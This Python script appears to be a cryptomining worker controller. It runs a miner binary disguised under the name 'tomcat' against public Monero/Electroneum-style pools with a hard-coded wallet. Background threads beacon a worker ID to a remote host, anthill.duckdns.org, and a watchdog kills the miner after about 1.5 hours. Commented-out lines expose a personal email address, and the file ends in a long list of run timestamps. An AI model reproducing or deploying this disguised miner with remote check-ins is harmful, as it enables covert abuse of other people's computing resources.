import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:05.223700
#2018-02-17 16:26:05.322047
#2018-02-17 18:13:05.296769
#2018-02-17 20:00:09.389226
#2018-02-17 21:48:04.585902
#2018-02-17 23:32:05.992251
#2018-02-18 01:21:04.111413
#2018-02-18 03:08:06.337726
#2018-02-18 04:55:05.709796
#2018-02-18 06:44:06.009629
#2018-02-18 08:32:07.278426
#2018-02-18 10:19:04.074735
#2018-02-18 12:05:02.110992
#2018-02-18 13:50:08.142025
#2018-02-18 15:41:05.581425
#2018-02-18 17:31:05.784744
#2018-02-18 19:18:06.695012
#2018-02-18 21:04:05.382829
#2018-02-18 22:51:06.749540
#2018-02-19 00:39:03.984593
#2018-02-19 02:25:06.626972
#2018-02-19 04:12:05.065073
#2018-02-19 05:56:06.456928
#2018-02-19 07:45:08.790045
#2018-02-19 09:34:06.181509
#2018-02-19 11:24:04.027909
#2018-02-19 13:11:06.763246
#2018-02-19 14:58:07.598234
#2018-02-19 16:48:07.104697
#2018-02-19 18:34:02.774074
#2018-02-19 20:20:01.324902
#2018-02-19 22:09:02.127619
#2018-02-19 23:56:05.791783
#2018-02-20 01:43:01.657415
#2018-02-20 03:30:09.939861
#2018-02-20 05:17:02.047380
#2018-02-20 07:01:05.546152
#2018-02-20 08:47:04.040331
#2018-02-20 10:31:01.840548
#2018-02-20 12:15:08.357765
#2018-02-20 14:03:01.611922
#2018-02-20 15:46:07.044479
#2018-02-20 17:33:11.317268
#2018-02-20 19:22:05.981766
#2018-02-20 21:10:07.047190
#2018-02-20 22:56:08.488677
#2018-02-21 00:41:05.388975
#2018-02-21 02:26:08.804290
#2018-02-21 04:12:09.740153
#2018-02-21 05:58:05.835617
#2018-02-21 07:46:13.174487
#2018-02-21 09:31:05.015181
#2018-02-21 11:19:06.835254
#2018-02-21 13:07:09.316002
#2018-02-21 14:55:03.821439
#2018-02-21 16:45:02.201686
#2018-02-21 18:35:10.127086
#2018-02-21 20:20:04.175794
#2018-02-21 22:07:07.810116
#2018-02-21 23:57:04.381809
#2018-02-22 01:46:01.755654
#2018-02-22 03:33:05.504900
#2018-02-22 05:21:06.267741
#2018-02-22 07:05:09.024967
#2018-02-22 08:51:06.875339
#2018-02-22 10:39:03.922761
#2018-02-22 12:26:01.890060
#2018-02-22 14:11:05.267970
#2018-02-22 15:57:08.740199
#2018-02-22 17:43:06.794277
#2018-02-22 19:29:04.841608
#2018-02-22 21:21:04.472826
#2018-02-22 23:07:05.598879
#2018-02-23 00:54:07.194300
#2018-02-23 02:43:06.117656
#2018-02-23 04:31:04.321948
#2018-02-23 06:17:05.778488
#2018-02-23 08:07:03.441781
#2018-02-23 10:24:01.682725
#2018-02-23 12:18:05.584267
#2018-02-23 14:07:01.501147
#2018-02-23 15:57:04.510749
#2018-02-23 17:42:02.202637
#2018-02-23 19:29:05.473993
#2018-02-23 21:12:05.175587
#2018-02-23 22:59:05.866379
#2018-02-24 00:47:05.786037
#2018-02-24 02:41:07.707277
#2018-02-24 04:35:08.070629
#2018-02-24 06:19:07.192728
#2018-02-24 08:07:01.931089
#2018-02-24 09:51:05.876761
#2018-02-24 11:45:07.932097
#2018-02-24 13:36:05.567351
#2018-02-24 15:23:07.109079
#2018-02-24 17:13:01.525093
#2018-02-24 19:05:01.421469
#2018-02-24 20:53:05.783734
#2018-02-24 23:15:07.617390
#2018-02-25 02:40:06.162182
#2018-02-25 06:23:02.084041
#2018-02-25 11:39:04.181523